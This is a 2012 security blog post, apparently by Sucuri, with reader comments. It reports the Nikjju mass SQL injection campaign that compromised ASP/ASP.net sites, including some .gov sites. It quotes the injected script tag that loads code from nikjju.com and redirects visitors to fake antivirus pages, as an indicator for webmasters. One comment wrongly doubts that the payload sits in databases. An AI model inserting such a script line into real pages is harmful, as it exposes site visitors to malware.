Nikjju Mass injection campaign (180k+ pages compromised)

  • April 17, 2012

Our research team have been tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them.

Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to lizamoon from last year). When successful, it adds the following javascript to the compromised sites:

<script src= http://nikjju.com/r.php ></script>


This is used to redirect anyone visiting the infected websites to Fake/Rogue AVs (best-antiviruu.de.lv – mostly targeting Windows users). All the sites we analysed so far are Windows-based servers running ASP/ASP.net compromised via SQL injection.

Google

So far Google has identified 188,000 pages infected with that javascript call, but the number is growing really fast. It was less than 130,000 yesterday afternoon.

Another interesting thing is that if you move up the Google results pages, you’ll get “Page 4 of about 457,000 results (0.21 seconds)”. It is likely that the number is even higher than our estimated 180k pages.

Nikjju.com

The domain Nikjju.com (31.210.100.242) was registered April 1st and we started to see the first batch of compromised sites a few days after (April 4th).

Updated Date: 01-apr-2012
Creation Date: 01-apr-2012

To Webmasters

If your suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner).

You will also need to audit your code to make sure that any user input is sanitized before use.

.Govs

We are seeing a few small .gov sites compromised as well (mostly from China):

jnd.xmchengdu.gov.cn
study.dyny.gov.cn
www.cnll.gov.cn
www.bj.hzjcy.gov.cn
www.mirpurkhas.gov.pk
www.tdnyw.gov.cn
gcjs.kaifeng.gov.cn

More details to follow..

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags
15 comments

  1. Can I search my data base for: “http:// nikjju. com/r.php” and it will come up?

    1. No, you would already know if your site would be compromised, since then it would redirect itself to some spam site.

      I don’t believe that they would add such rogue links into databases, since it would not have any outer effect to the site.

  2. Pingback: Quase 190 mil sites estão infectados com nova praga – REPASSANDO AS MELHORES MATERIAS DO MAIORES SITES DO BRASIL
  4. Pingback: Mass SQL Injection Attacks 1.1 million ASP based websites – Blog Ham
  5. Pingback: Nikjju SQL injection update (now hgbyju. com/r.php) | Sucuri
  6. Pingback: Quase 190 mil sites estão infectados com nova praga | Cadê Avaré - Portal de Anúncios e Guia Comercial
  7. Pingback: Yet Another SQL Injection Attack « Noobsters's Blog
  8. Pingback: IT Defense Solutions » Cyber Security News – May 4, 2012
  10. Pingback: Yet Another SQL Injection Attack : QualTech Software

  11. So, this looks like an XSS attack stored via an SQL injection vulnerability. I wonder why it’s not called a mass XSS attack? 

Comments are closed.

Related Categories
You May Also Like